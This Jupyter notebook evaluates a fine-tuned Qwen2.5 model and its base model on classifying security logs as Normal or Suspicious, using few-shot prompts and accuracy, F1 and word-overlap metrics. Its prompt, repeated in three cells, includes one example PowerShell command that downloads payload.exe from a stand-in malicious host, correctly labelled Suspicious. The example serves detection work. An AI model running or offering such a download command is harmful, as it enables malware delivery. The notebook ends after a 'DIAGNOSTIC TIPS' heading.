In [None]:
# Check GPU availability: shell out to `nvidia-smi` so the GPU visible to this
# session (if any) is shown in the cell output before any model is loaded.
!nvidia-smi

In [None]:
# Install required packages
print("üì¶ Installing dependencies...")
!pip install -q transformers datasets accelerate peft tqdm pandas numpy scikit-learn matplotlib seaborn
print("‚úÖ Dependencies installed!")

In [None]:
# Configuration: model/data locations and evaluation knobs read by later cells.
import os

# Kaggle paths - UPDATE THESE based on your uploaded dataset names
MODEL_PATH = "/kaggle/input/mitre-fine-tuned-model"  # Your uploaded model dataset
# NOTE(review): "datset" looks like a typo of "dataset" - confirm it matches the real Kaggle dataset slug.
DATA_PATH = "/kaggle/input/mitre-datset"  # Your test data dataset
TEST_FILE = f"{DATA_PATH}/test.jsonl"

# Evaluation settings
# NOTE(review): an earlier comment claimed EVAL_LIMIT was raised to 100, but the value is 5 - confirm the intended size.
EVAL_LIMIT = 5  # Number of test examples to evaluate; a falsy value is reported below as 'Full dataset'
MAX_NEW_TOKENS = 512  # Generation budget in new tokens per response (raised from 256 for longer responses)

print("‚úÖ Configuration loaded")
print(f"   Model: {MODEL_PATH}")
print(f"   Test data: {TEST_FILE}")
print(f"   Evaluation limit: {EVAL_LIMIT if EVAL_LIMIT else 'Full dataset'}")

# Verify paths exist (report only; a missing path does not stop the notebook here)
if os.path.exists(MODEL_PATH):
    print(f"‚úÖ Model found: {len(os.listdir(MODEL_PATH))} files")
else:
    print(f"‚ùå Model not found at {MODEL_PATH}")
    print("   Please upload your fine_tuned_model as a Kaggle dataset")

if os.path.exists(TEST_FILE):
    print(f"‚úÖ Test file found")
else:
    print(f"‚ùå Test file not found at {TEST_FILE}")
    print("   Please add your test dataset to Kaggle")

In [None]:
# Load the fine-tuned model and its tokenizer from MODEL_PATH (set in the configuration cell).
print("üîÑ Loading fine-tuned model...\n")

from transformers import AutoModelForCausalLM, AutoTokenizer
import torch

# Weights are requested in float16; device_map="auto" leaves device placement to the library.
model = AutoModelForCausalLM.from_pretrained(
    MODEL_PATH,
    torch_dtype=torch.float16,
    device_map="auto",
    trust_remote_code=True
)

tokenizer = AutoTokenizer.from_pretrained(MODEL_PATH, trust_remote_code=True)
# NOTE(review): this unconditionally replaces any pad token the tokenizer already defines - confirm that is intended.
tokenizer.pad_token = tokenizer.eos_token

model.eval()  # Set to evaluation mode

print(f"‚úÖ Model loaded from: {MODEL_PATH}")
# memory_allocated() is reported in bytes; dividing by 1024**3 converts to GiB.
print(f"üìä GPU Memory: {torch.cuda.memory_allocated() / 1024**3:.2f} GB")
print(f"üìä Model device: {model.device}")

In [None]:
# Load test dataset: read TEST_FILE with the `json` loader into a single 'test' split
# and preview the first record.
print("üîÑ Loading test dataset...\n")

from datasets import load_dataset

test_dataset = load_dataset('json', data_files={'test': TEST_FILE})['test']

print(f"‚úÖ Test dataset loaded: {len(test_dataset):,} examples")
print(f"\nüìã Dataset columns: {test_dataset.column_names}")
# The preview reads the 'instruction', 'input' and 'output' fields of the first example
# and shows at most the first 100 characters of each.
print(f"\nüìã Sample test entry:")
print(f"   Instruction: {test_dataset[0]['instruction'][:100]}...")
print(f"   Input: {test_dataset[0]['input'][:100]}...")
print(f"   Output: {test_dataset[0]['output'][:100]}...")

In [None]:
# TEST BASE MODEL WITH FEW-SHOT PROMPTING
# Smoke test: run the base (not fine-tuned) model on the first test example with a
# two-example few-shot prompt, print its answer next to the expected output, check
# the answer format, then unload the base model again.
print("üîÑ Loading BASE Qwen2.5-1.5B-Instruct model (not fine-tuned)...\n")

import gc
from transformers import AutoModelForCausalLM, AutoTokenizer
import torch
import re
import json

# Load the original base model
base_model = AutoModelForCausalLM.from_pretrained(
    "Qwen/Qwen2.5-1.5B-Instruct",
    torch_dtype=torch.float16,
    device_map="auto",
    trust_remote_code=True
)

base_tokenizer = AutoTokenizer.from_pretrained("Qwen/Qwen2.5-1.5B-Instruct", trust_remote_code=True)
base_tokenizer.pad_token = base_tokenizer.eos_token

base_model.eval()

print(f"‚úÖ Base model loaded")
print(f"üìä GPU Memory: {torch.cuda.memory_allocated() / 1024**3:.2f} GB\n")

print("="*80)
# The banner now matches what the cell does: the input text is NOT truncated here.
print("üéØ USING FEW-SHOT PROMPTING (FULL INPUT, NO TRUNCATION)")
print("="*80)
print("Showing the model 2 examples of the exact format we want,")
print("then asking it to classify a new log.\n")

# Get test examples
example = test_dataset[0]

# USE FULL INPUT - NO TRUNCATION!
input_text = example['input']
print(f"‚úÖ Using FULL input: {len(input_text)} chars (no truncation)")

# FEW-SHOT PROMPT: Include 2 examples before the actual test
prompt = f"""You are a cybersecurity analyst. Analyze system logs and determine if they show normal or suspicious activity.

Output format:
Status: Normal OR Status: Suspicious
Reason: Brief explanation

### Example 1:
Input: {{"EventID": 4624, "LogonType": 2, "Account": "user@domain.com", "Workstation": "DESKTOP-123"}}
Response:
Status: Normal
Reason: Standard interactive logon (LogonType 2) from a legitimate user account on a known workstation. No indicators of compromise.

### Example 2:
Input: {{"EventID": 4688, "Process": "powershell.exe", "CommandLine": "Invoke-WebRequest http://malicious.com/payload.exe -OutFile C:\\\\temp\\\\mal.exe", "User": "SYSTEM"}}
Response:
Status: Suspicious
Reason: PowerShell executing under SYSTEM context downloading executable from external site - indicates potential malware download (T1105 - Ingress Tool Transfer).

### Now analyze this log:
Input: {input_text}
Response:
"""

print(f"üìä FULL PROMPT LENGTH: {len(prompt)} characters")
print(f"üìã EXPECTED OUTPUT: {example['output']}\n")

# Count the tokens the full prompt needs, WITHOUT truncation.
# (The earlier fixed max_length=4096 tokenization was redundant: its result was
# overwritten below and it printed "After tokenization" a second time.)
test_tokens = base_tokenizer(prompt, return_tensors="pt", truncation=False)
actual_tokens = test_tokens['input_ids'].shape[1]
print(f"üìä Actual tokens needed: {actual_tokens}")

# Use appropriate max_length (4096, 8192, or 16384)
if actual_tokens <= 4096:
    max_len = 4096
elif actual_tokens <= 8192:
    max_len = 8192
else:
    max_len = 16384

print(f"üìä Using max_length: {max_len}")

# Tokenize with dynamic max_length
inputs = base_tokenizer(prompt, return_tensors="pt", truncation=True, max_length=max_len)
inputs = {k: v.to(base_model.device) for k, v in inputs.items()}

print(f"üìä After tokenization: {inputs['input_ids'].shape[1]} tokens")

# Truncation happened only if the prompt needed MORE tokens than max_len.
# Comparing the truncated length with `>= max_len` raised a false warning for a
# prompt that needs exactly max_len tokens.
if actual_tokens > max_len:
    print(f"‚ö†Ô∏è WARNING: Prompt was truncated to fit {max_len} tokens!")
    print(f"   Consider using larger max_length or shorter inputs")
else:
    print(f"‚úÖ No truncation - full input preserved!")

# Generate with some randomness for variety
# NOTE(review): sampling is unseeded, so this cell's output differs between runs.
print("\nüöÄ Generating response...")
with torch.no_grad():
    outputs = base_model.generate(
        **inputs,
        max_new_tokens=256,
        temperature=0.7,  # Increased for variety (was 0.1)
        do_sample=True,   # Enable sampling for variety (was False)
        top_p=0.9,        # Nucleus sampling
        pad_token_id=base_tokenizer.eos_token_id
    )
# Decode only the newly generated tokens (everything after the prompt)
generated_text = base_tokenizer.decode(outputs[0][inputs['input_ids'].shape[1]:], skip_special_tokens=True)

print(f"\nü§ñ BASE MODEL PREDICTED:")
print("="*80)
print(generated_text)
print("="*80)

print(f"\nüìä EXPECTED OUTPUT:")
print("="*80)
print(example['output'])
print("="*80)

# Check if it matches format
has_status = bool(re.search(r'Status:\s*(Normal|Suspicious)', generated_text, re.IGNORECASE))
has_reason = 'reason:' in generated_text.lower() or 'reason -' in generated_text.lower()

print(f"\n‚úÖ Format Check:")
print(f"   Contains 'Status: Normal/Suspicious': {has_status}")
print(f"   Contains 'Reason': {has_reason}")

if has_status:
    print("\nüéâ SUCCESS! Base model is now outputting the correct format!")
    print("   You can now run the evaluation cells to test on more examples.")
else:
    print("\n‚ö†Ô∏è Model output doesn't match format.")
    # The prompt's cue is the bare 'Response:' line, so the hint names that marker.
    print("   Likely cause: Input was truncated, model didn't see examples or 'Response:' marker")

print(f"\nüí° WHY OUTPUT WAS CONSISTENT BEFORE:")
print(f"   - do_sample=False (greedy decoding) = always picks most likely token")
print(f"   - temperature=0.1 (very low) = minimal randomness")
print(f"   - Truncated input at same point = same output every time")
print(f"\n   NOW USING: do_sample=True, temperature=0.7 for variety")

# Clean up to free memory: drop the references, collect garbage so the weights are
# actually released, then return the cached GPU blocks.
del base_model
del base_tokenizer
gc.collect()
torch.cuda.empty_cache()
print("\n‚úÖ Base model unloaded to free memory")

In [None]:
# TEST FINE-TUNED MODEL WITH SAME PROMPT AND INPUT
# Smoke test: run the fine-tuned `model`/`tokenizer` loaded earlier on the first test
# example with the same few-shot prompt as the base-model test and check the format.
print("üîÑ Testing FINE-TUNED model with same approach as base model...\n")

import re
import json

# MAX_LENGTH the fine-tuned model is reported (by this notebook's messages) to have been trained with.
TRAINING_MAX_LENGTH = 512

print("="*80)
print("üéØ TESTING FINE-TUNED MODEL (WITH FEW-SHOT PROMPTING)")
print("="*80)
print("Using the same prompt structure and full input as the base model test.\n")

# Get the same test example
example = test_dataset[0]

# USE FULL INPUT - NO TRUNCATION!
input_text = example['input']
print(f"‚úÖ Using FULL input: {len(input_text)} chars (no truncation)")

# FEW-SHOT PROMPT: Same as base model test
prompt = f"""You are a cybersecurity analyst. Analyze system logs and determine if they show normal or suspicious activity.

Output format:
Status: Normal OR Status: Suspicious
Reason: Brief explanation

### Example 1:
Input: {{"EventID": 4624, "LogonType": 2, "Account": "user@domain.com", "Workstation": "DESKTOP-123"}}
Response:
Status: Normal
Reason: Standard interactive logon (LogonType 2) from a legitimate user account on a known workstation. No indicators of compromise.

### Example 2:
Input: {{"EventID": 4688, "Process": "powershell.exe", "CommandLine": "Invoke-WebRequest http://malicious.com/payload.exe -OutFile C:\\\\temp\\\\mal.exe", "User": "SYSTEM"}}
Response:
Status: Suspicious
Reason: PowerShell executing under SYSTEM context downloading executable from external site - indicates potential malware download (T1105 - Ingress Tool Transfer).

### Now analyze this log:
Input: {input_text}
Response:
"""

print(f"üìä FULL PROMPT LENGTH: {len(prompt)} characters")
print(f"üìã EXPECTED OUTPUT: {example['output']}\n")

# Check actual token count WITHOUT truncation first
test_tokens = tokenizer(prompt, return_tensors="pt", truncation=False)
actual_tokens = test_tokens['input_ids'].shape[1]
print(f"üìä Actual tokens needed: {actual_tokens}")

# Use appropriate max_length (4096, 8192, or 16384)
if actual_tokens <= 4096:
    max_len = 4096
elif actual_tokens <= 8192:
    max_len = 8192
else:
    max_len = 16384

print(f"üìä Using max_length: {max_len}")

# Tokenize with dynamic max_length
inputs = tokenizer(prompt, return_tensors="pt", truncation=True, max_length=max_len)
inputs = {k: v.to(model.device) for k, v in inputs.items()}

print(f"üìä After tokenization: {inputs['input_ids'].shape[1]} tokens")

# Truncation happened only if the prompt needed MORE tokens than max_len.
# Comparing the truncated length with `>= max_len` raised a false warning for a
# prompt that needs exactly max_len tokens.
if actual_tokens > max_len:
    print(f"‚ö†Ô∏è WARNING: Prompt was truncated to fit {max_len} tokens!")
    print(f"   Consider using larger max_length or shorter inputs")
else:
    print(f"‚úÖ No truncation - full input preserved!")

# Generate with same parameters as base model
# NOTE(review): sampling is unseeded, so this cell's output differs between runs.
print("\nüöÄ Generating response with FINE-TUNED model...")
with torch.no_grad():
    outputs = model.generate(
        **inputs,
        max_new_tokens=256,
        temperature=0.7,
        do_sample=True,
        top_p=0.9,
        pad_token_id=tokenizer.eos_token_id
    )

# Decode only the newly generated tokens (everything after the prompt)
generated_text = tokenizer.decode(outputs[0][inputs['input_ids'].shape[1]:], skip_special_tokens=True)

print(f"\nü§ñ FINE-TUNED MODEL PREDICTED:")
print("="*80)
print(generated_text)
print("="*80)

print(f"\nüìä EXPECTED OUTPUT:")
print("="*80)
print(example['output'])
print("="*80)

# Check if it matches format
has_status = bool(re.search(r'Status:\s*(Normal|Suspicious)', generated_text, re.IGNORECASE))
has_reason = 'reason:' in generated_text.lower() or 'reason -' in generated_text.lower()

print(f"\n‚úÖ Format Check:")
print(f"   Contains 'Status: Normal/Suspicious': {has_status}")
print(f"   Contains 'Reason': {has_reason}")

if has_status:
    print("\nüéâ SUCCESS! Fine-tuned model is outputting the correct format!")
    print("   The model has learned the task properly.")
else:
    print("\n‚ö†Ô∏è Model output doesn't match expected format.")
    print("   This suggests the model needs retraining with proper parameters.")
    print("   Recommendation: Retrain with MAX_LENGTH=8192, 5 epochs")

# Compare with base model results
print(f"\nüí° COMPARISON:")
print(f"   Fine-tuned model was trained with MAX_LENGTH={TRAINING_MAX_LENGTH} (original)")
print(f"   Current input needs: {actual_tokens} tokens")
print(f"   If output is gibberish, model needs retraining with MAX_LENGTH=8192")


In [None]:
# Define evaluation functions with FEW-SHOT PROMPTING and INPUT TRUNCATION.
# This cell only defines helpers (generation, label extraction, text-overlap metrics);
# nothing is evaluated until the evaluation loop cell calls them.
print("üîÑ Defining evaluation functions with few-shot prompting...\n")

def _build_few_shot_prompt(input_text):
    """Return the two-example few-shot prompt with `input_text` as the log to analyze."""
    return f"""You are a cybersecurity analyst. Analyze system logs and determine if they show normal or suspicious activity.

Output format:
Status: Normal OR Status: Suspicious
Reason: Brief explanation

### Example 1:
Input: {{"EventID": 4624, "LogonType": 2, "Account": "user@domain.com", "Workstation": "DESKTOP-123"}}
Response:
Status: Normal
Reason: Standard interactive logon (LogonType 2) from a legitimate user account on a known workstation. No indicators of compromise.

### Example 2:
Input: {{"EventID": 4688, "Process": "powershell.exe", "CommandLine": "Invoke-WebRequest http://malicious.com/payload.exe -OutFile C:\\\\temp\\\\mal.exe", "User": "SYSTEM"}}
Response:
Status: Suspicious
Reason: PowerShell executing under SYSTEM context downloading executable from external site - indicates potential malware download (T1105 - Ingress Tool Transfer).

### Now analyze this log:
Input: {input_text}
Response:
"""


def generate_response(model, tokenizer, instruction, input_text, max_new_tokens=512,
                      max_input_chars=6000, max_prompt_tokens=3072,
                      do_sample=True, temperature=0.7, top_p=0.9):
    """Generate a response using few-shot prompting to guide format.

    Args:
        model: Causal LM exposing `.device` and `.generate(**kwargs)`.
        tokenizer: Tokenizer matching `model`; called on the prompt and used to decode.
        instruction: Accepted for interface compatibility; the fixed few-shot prompt
            is used instead, so this value is not inserted into the prompt.
        input_text: Raw log text to classify.
        max_new_tokens: Maximum number of tokens to generate.
        max_input_chars: Character cap applied to `input_text` before prompting.
        max_prompt_tokens: Token cap for the whole prompt.
        do_sample: Sample when True; pass False for repeatable greedy decoding.
        temperature: Sampling temperature (only passed when `do_sample` is True).
        top_p: Nucleus-sampling threshold (only passed when `do_sample` is True).

    Returns:
        The generated continuation (prompt removed), stripped of surrounding whitespace.
    """
    truncation_marker = "... [truncated]"

    # First pass: cheap character-level cap on the log text.
    log_text = input_text
    was_cut = len(log_text) > max_input_chars
    if was_cut:
        log_text = log_text[:max_input_chars]

    def _render(text, cut):
        return _build_few_shot_prompt(text + truncation_marker if cut else text)

    prompt = _render(log_text, was_cut)
    n_tokens = len(tokenizer(prompt)["input_ids"])

    # Second pass: if the prompt still exceeds the token budget, shrink ONLY the log.
    # Letting the tokenizer truncate on the right would drop the end of the prompt,
    # including the final "Response:" cue the model needs to answer in format.
    # Each round keeps strictly less text, so the loop terminates.
    while n_tokens > max_prompt_tokens and log_text:
        keep = int(len(log_text) * max_prompt_tokens / n_tokens * 0.9)
        log_text = log_text[:keep]
        was_cut = True
        prompt = _render(log_text, was_cut)
        n_tokens = len(tokenizer(prompt)["input_ids"])

    # truncation=True stays as a last-resort guard (e.g. the template alone is too long).
    inputs = tokenizer(prompt, return_tensors="pt", truncation=True, max_length=max_prompt_tokens)
    inputs = {k: v.to(model.device) for k, v in inputs.items()}

    generation_kwargs = {
        "max_new_tokens": max_new_tokens,
        "do_sample": do_sample,
        "pad_token_id": tokenizer.eos_token_id,
    }
    if do_sample:
        # Sampling-only settings are omitted for greedy decoding.
        generation_kwargs["temperature"] = temperature
        generation_kwargs["top_p"] = top_p

    with torch.no_grad():
        outputs = model.generate(**inputs, **generation_kwargs)

    # Decode only the generated part (remove the prompt)
    prompt_len = inputs['input_ids'].shape[1]
    generated_text = tokenizer.decode(outputs[0][prompt_len:], skip_special_tokens=True)
    return generated_text.strip()

# FIXED: Better label extraction for status classification
def extract_status_label(text):
    """Extract Normal/Suspicious/Unknown from model output.

    The FIRST "Status: <verdict>" occurrence decides the label, so text the model
    emits after its answer (e.g. further invented examples) cannot flip the result.
    Matching ignores case, tolerates any whitespace around the colon and optional
    markdown asterisks (e.g. "**Status:** Normal").

    Args:
        text: Model output or reference answer; may be empty or None.

    Returns:
        'NORMAL', 'SUSPICIOUS', or 'UNKNOWN' when no status line is found.
    """
    import re

    if not text:
        return 'UNKNOWN'

    match = re.search(r'status\s*\**\s*:\s*\**\s*(normal|suspicious)', text, re.IGNORECASE)
    if match is None:
        return 'UNKNOWN'
    return match.group(1).upper()

def extract_technique_id(text):
    """Extract MITRE technique ID from text (e.g., T1234, T1234.001).

    The text is upper-cased first so lower-case IDs ("t1059") are found. Word
    boundaries keep the pattern from matching inside longer tokens: after
    upper-casing, "port1234" would otherwise yield "T1234".

    Args:
        text: Text to search; may be empty or None.

    Returns:
        The first technique ID found (upper-case), or None if there is none.
    """
    import re

    if not text:
        return None

    match = re.search(r'\bT\d{4}(?:\.\d{3})?\b', text.upper())
    return match.group(0) if match else None

def calculate_exact_match(pred, target):
    """Return 1.0 if both strings are equal ignoring case and surrounding whitespace, else 0.0."""
    normalized_pred = pred.strip().lower()
    normalized_target = target.strip().lower()
    if normalized_pred == normalized_target:
        return 1.0
    return 0.0

def calculate_partial_match(pred, target):
    """Return the fraction of distinct target words that also occur in the prediction.

    Both strings are lower-cased and split on whitespace; duplicates are ignored.
    An empty target scores 0.0.
    """
    predicted_tokens = set(pred.strip().lower().split())
    expected_tokens = set(target.strip().lower().split())

    if not expected_tokens:
        return 0.0

    shared = expected_tokens & predicted_tokens
    return len(shared) / len(expected_tokens)

def calculate_f1_score(pred, target):
    """Return the F1 score of the distinct-word overlap between prediction and target.

    Both strings are lower-cased and split on whitespace into sets. The score is 0.0
    when either set is empty or when the sets share no word.
    """
    predicted_tokens = set(pred.strip().lower().split())
    expected_tokens = set(target.strip().lower().split())

    if not predicted_tokens or not expected_tokens:
        return 0.0

    shared = len(predicted_tokens & expected_tokens)
    precision = shared / len(predicted_tokens)
    recall = shared / len(expected_tokens)

    denominator = precision + recall
    if denominator == 0:
        return 0.0

    return 2 * (precision * recall) / denominator

# Summary of the limits and sampling settings used by generate_response.
# These messages are hard-coded text: update them by hand if the character cap,
# token max_length or sampling settings in that function change.
print("‚úÖ Evaluation functions defined with few-shot prompting")
print("   üìä Input truncated to 6000 chars to fit within token limits")
print("   üìä max_length=3072 tokens (examples + truncated input + response)")
print("   üìä Using temperature=0.7, do_sample=True for variety")


In [None]:
# Run evaluation: generate a prediction for each selected test example, score it with
# the text-overlap metrics, and collect per-example records in `results`.
print("üöÄ Running evaluation on test set...\n")

from tqdm import tqdm
import time

# Determine sample size.
# A missing or non-positive EVAL_LIMIT means "full dataset". The configuration cell
# already reports a falsy limit as 'Full dataset'; previously EVAL_LIMIT=0 selected
# zero rows here and the timing line below divided by zero.
if EVAL_LIMIT is None or EVAL_LIMIT <= 0:
    eval_samples = test_dataset
    print(f"Evaluating on FULL test set: {len(eval_samples):,} examples")
else:
    eval_samples = test_dataset.select(range(min(EVAL_LIMIT, len(test_dataset))))
    print(f"Evaluating on LIMITED test set: {len(eval_samples):,} examples (out of {len(test_dataset):,})")

print(f"This may take a while...\n")

results = []
exact_matches = 0
partial_match_scores = []
f1_scores = []

start_time = time.time()

for i, example in enumerate(tqdm(eval_samples, desc="Evaluating")):
    # Generate prediction
    prediction = generate_response(
        model,
        tokenizer,
        example['instruction'],
        example['input'],
        max_new_tokens=MAX_NEW_TOKENS
    )

    # Calculate metrics
    exact_match = calculate_exact_match(prediction, example['output'])
    partial_match = calculate_partial_match(prediction, example['output'])
    f1 = calculate_f1_score(prediction, example['output'])

    exact_matches += exact_match
    partial_match_scores.append(partial_match)
    f1_scores.append(f1)

    # Store result
    results.append({
        'index': i,
        'instruction': example['instruction'],
        'input': example['input'],
        'expected': example['output'],
        'predicted': prediction,
        'exact_match': exact_match,
        'partial_match': partial_match,
        'f1_score': f1
    })

    # Show first 10 examples (FIXED: increased from 5)
    if i < 10:
        print(f"\n{'='*80}")
        print(f"Example {i+1}:")
        print(f"Instruction: {example['instruction'][:80]}...")
        print(f"Input: {example['input'][:80]}...")
        print(f"Expected: {example['output'][:200]}...")
        print(f"Predicted: {prediction[:200]}...")
        print(f"Metrics: Exact={exact_match}, Partial={partial_match:.2f}, F1={f1:.2f}")

elapsed = time.time() - start_time

# Guard the per-example average so an empty test set cannot raise ZeroDivisionError.
n_evaluated = len(eval_samples)
sec_per_example = elapsed / n_evaluated if n_evaluated else 0.0

print(f"\n{'='*80}")
print(f"‚úÖ Evaluation completed in {elapsed/60:.2f} minutes ({sec_per_example:.2f} sec/example)")

In [None]:
# TOKEN USAGE STATISTICS
# Summarize per-example prompt token counts from `token_stats`: a list of dicts with
# the keys 'actual_tokens', 'max_length_used' and 'truncated' (as read below).
print("\n" + "="*80)
print("üìä TOKEN USAGE STATISTICS (FULL INPUT)")
print("="*80 + "\n")

# No visible cell populates `token_stats`. Fall back to an empty list so that a fresh
# kernel reaches the "run evaluation first" message instead of raising NameError.
token_stats = globals().get("token_stats") or []

if token_stats:
    import math
    import numpy as np

    actual_tokens_list = [s['actual_tokens'] for s in token_stats]
    max_lengths_used = [s['max_length_used'] for s in token_stats]
    truncated_count = sum(1 for s in token_stats if s['truncated'])

    print(f"Total examples processed: {len(token_stats)}")
    print(f"\nüìà Token Count Statistics (Input + Few-shot Examples):")
    print(f"   Min tokens:     {min(actual_tokens_list):,}")
    print(f"   Max tokens:     {max(actual_tokens_list):,}")
    print(f"   Average tokens: {np.mean(actual_tokens_list):,.0f}")
    print(f"   Median tokens:  {np.median(actual_tokens_list):,.0f}")

    print(f"\nüìä Max Length Distribution:")
    max_len_4096 = sum(1 for ml in max_lengths_used if ml == 4096)
    max_len_8192 = sum(1 for ml in max_lengths_used if ml == 8192)
    max_len_16384 = sum(1 for ml in max_lengths_used if ml == 16384)

    print(f"   Used 4096:  {max_len_4096} examples ({max_len_4096/len(token_stats)*100:.1f}%)")
    print(f"   Used 8192:  {max_len_8192} examples ({max_len_8192/len(token_stats)*100:.1f}%)")
    print(f"   Used 16384: {max_len_16384} examples ({max_len_16384/len(token_stats)*100:.1f}%)")

    if truncated_count > 0:
        print(f"\n‚ö†Ô∏è WARNING: {truncated_count} examples were truncated!")
        print(f"   Consider using an even larger max_length or shorter inputs")
    else:
        print(f"\n‚úÖ No truncation occurred - all inputs fit within max_length limits")

    # Recommendation for training: round the largest observed token count up to the
    # next power of 2. max(1, ...) keeps log2 defined if every count is 0.
    recommended_max_length = max(1, max(actual_tokens_list))
    recommended_max_length = 2 ** math.ceil(math.log2(recommended_max_length))

    print(f"\nüí° RECOMMENDATION FOR TRAINING:")
    print(f"   For training, use MAX_LENGTH = {recommended_max_length} to fit all examples")
    print(f"   This ensures no data loss during fine-tuning")
else:
    print("‚ö†Ô∏è No token statistics collected yet - run evaluation first!")

print("="*80)


In [None]:
# Calculate comprehensive metrics - FIXED VERSION
# Turns the free-text `results` from the evaluation loop into status labels and
# computes classification metrics on them, plus averages of the word-level scores.
print("\n" + "="*80)
print("üìä CALCULATING COMPREHENSIVE METRICS")
print("="*80 + "\n")

import numpy as np
from sklearn.metrics import (
    accuracy_score, 
    precision_score, 
    recall_score, 
    f1_score, 
    confusion_matrix,
    classification_report
)
import pandas as pd
from collections import Counter

# FIXED: Extract status labels (Normal/Suspicious) instead of just MITRE IDs
# Outputs without a recognizable status line become the extra label 'UNKNOWN',
# which then takes part in the metrics below like any other class.
y_true_status = [extract_status_label(r['expected']) for r in results]
y_pred_status = [extract_status_label(r['predicted']) for r in results]

print("="*80)
print("üéØ STATUS CLASSIFICATION METRICS (Normal vs Suspicious)")
print("="*80 + "\n")

# Get unique status labels (union of expected and predicted, sorted)
unique_status_labels = sorted(list(set(y_true_status + y_pred_status)))
print(f"üìã Status labels found: {unique_status_labels}\n")

# Print label distribution
print(f"Expected label distribution:")
print(f"  {Counter(y_true_status)}\n")
print(f"Predicted label distribution:")
print(f"  {Counter(y_pred_status)}\n")

# Calculate status classification metrics
# zero_division=0 scores a class with no predicted/true samples as 0 instead of warning.
status_accuracy = accuracy_score(y_true_status, y_pred_status)
status_precision_macro = precision_score(y_true_status, y_pred_status, average='macro', zero_division=0)
status_precision_weighted = precision_score(y_true_status, y_pred_status, average='weighted', zero_division=0)
status_recall_macro = recall_score(y_true_status, y_pred_status, average='macro', zero_division=0)
status_recall_weighted = recall_score(y_true_status, y_pred_status, average='weighted', zero_division=0)
status_f1_macro = f1_score(y_true_status, y_pred_status, average='macro', zero_division=0)
status_f1_weighted = f1_score(y_true_status, y_pred_status, average='weighted', zero_division=0)

print("üéØ STATUS CLASSIFICATION OVERALL METRICS:")
print(f"   Accuracy:             {status_accuracy:.4f} ({status_accuracy*100:.2f}%)")
print(f"\n   Precision (Macro):    {status_precision_macro:.4f}")
print(f"   Precision (Weighted): {status_precision_weighted:.4f}")
print(f"\n   Recall (Macro):       {status_recall_macro:.4f}")
print(f"   Recall (Weighted):    {status_recall_weighted:.4f}")
print(f"\n   F1-Score (Macro):     {status_f1_macro:.4f}")
print(f"   F1-Score (Weighted):  {status_f1_weighted:.4f}")

# Detailed classification report
print(f"\nüìä DETAILED STATUS CLASSIFICATION REPORT:")
print(classification_report(y_true_status, y_pred_status, zero_division=0))

# Status confusion matrix (rows/columns ordered as unique_status_labels)
status_conf_matrix = confusion_matrix(y_true_status, y_pred_status, labels=unique_status_labels)

# Calculate word-level metrics (from previous evaluation)
# NOTE(review): exact_matches / len(eval_samples) raises ZeroDivisionError if the
# evaluation ran on an empty sample - confirm that cannot happen.
avg_partial_match = np.mean(partial_match_scores)
avg_f1_word = np.mean(f1_scores)
exact_match_accuracy = exact_matches / len(eval_samples)

print(f"\n" + "="*80)
print("üìù WORD-LEVEL SIMILARITY METRICS:")
print("="*80)
print(f"   Exact Match Accuracy: {exact_match_accuracy:.4f} ({exact_match_accuracy*100:.2f}%)")
print(f"   Avg Partial Match:    {avg_partial_match:.4f}")
print(f"   Avg F1 (Word-level):  {avg_f1_word:.4f}")

# Store metrics for later use: the summary, CSV export and plotting cells read
# these shorter names rather than the status_* ones.
accuracy = status_accuracy
precision_macro = status_precision_macro
precision_weighted = status_precision_weighted
recall_macro = status_recall_macro
recall_weighted = status_recall_weighted
f1_macro = status_f1_macro
f1_weighted = status_f1_weighted
unique_labels = unique_status_labels
conf_matrix = status_conf_matrix
y_true = y_true_status
y_pred = y_pred_status

print(f"\n‚úÖ Metrics calculated successfully!")

In [None]:
# INSPECTION: Manual review of predictions
# Counts predictions per extracted status label, warns when more than half are
# UNKNOWN, then prints a handful of examples (unparseable ones first).
print("\n" + "="*80)
print("üîç MANUAL INSPECTION OF PREDICTIONS")
print("="*80 + "\n")

print("This helps you see what the model is actually generating.\n")

# Analyze all predictions first
unknown_count = sum(1 for r in results if extract_status_label(r['predicted']) == 'UNKNOWN')
normal_count = sum(1 for r in results if extract_status_label(r['predicted']) == 'NORMAL')
suspicious_count = sum(1 for r in results if extract_status_label(r['predicted']) == 'SUSPICIOUS')

print("="*80)
print("‚ö†Ô∏è MODEL OUTPUT ANALYSIS")
print("="*80)
print(f"Total predictions: {len(results)}")
print(f"  NORMAL predictions: {normal_count}")
print(f"  SUSPICIOUS predictions: {suspicious_count}")
print(f"  UNKNOWN predictions: {unknown_count}")

# Warn only when strictly more than half of the predictions could not be parsed.
if unknown_count > len(results) * 0.5:
    print(f"\nüö® WARNING: {unknown_count}/{len(results)} predictions are UNKNOWN!")
    print("   This means the model is NOT generating the expected format:")
    print("   'Status: Normal' or 'Status: Suspicious'")
    print("\n   The model is likely BROKEN or NOT PROPERLY TRAINED!")
    print("\n   Common causes:")
    print("   1. Model didn't learn the task (too few epochs, wrong data)")
    print("   2. Input is being truncated (logs too long for 512 tokens)")
    print("   3. Generation parameters are wrong")
    print("   4. Prompt format mismatch between training and evaluation")
print("="*80 + "\n")

# Show 5 examples - prioritize showing broken ones first
broken_indices = [i for i, r in enumerate(results) if extract_status_label(r['predicted']) == 'UNKNOWN']
working_indices = [i for i, r in enumerate(results) if extract_status_label(r['predicted']) != 'UNKNOWN']

# Fixed seed so the same "working" examples are sampled on every run.
import random
random.seed(42)

if broken_indices:
    sample_indices = broken_indices[:3]  # Show 3 broken examples
    if working_indices:
        sample_indices += random.sample(working_indices, min(2, len(working_indices)))  # Add 2 working ones if any
else:
    sample_indices = random.sample(range(len(results)), min(5, len(results)))

for idx in sample_indices:
    result = results[idx]
    pred_status = extract_status_label(result['predicted'])
    exp_status = extract_status_label(result['expected'])
    
    print(f"\n{'='*80}")
    print(f"Example {idx + 1}:")
    
    print(f"\nüìù EXPECTED OUTPUT:")
    print(f"{result['expected']}")
    
    # Long predictions are cut to 500 characters for display only; `results` is untouched.
    print(f"\nü§ñ MODEL PREDICTED:")
    if len(result['predicted']) > 500:
        print(f"{result['predicted'][:500]}... [TRUNCATED - {len(result['predicted'])} chars total]")
    else:
        print(f"{result['predicted']}")
    
    print(f"\nüìä STATUS: Expected={exp_status}, Predicted={pred_status}")
    print(f"‚úì Match: {exp_status == pred_status}")
    
    if pred_status == 'UNKNOWN':
        print("\n‚ö†Ô∏è BROKEN: Model output doesn't contain 'Status:' - model is not working!")

# NOTE(review): the tips below mention max_length 512/1024/2048, while generate_response
# tokenizes with max_length=3072 - confirm which figure the advice should quote.
print(f"\n{'='*80}")
print("üí° DIAGNOSTIC TIPS:")
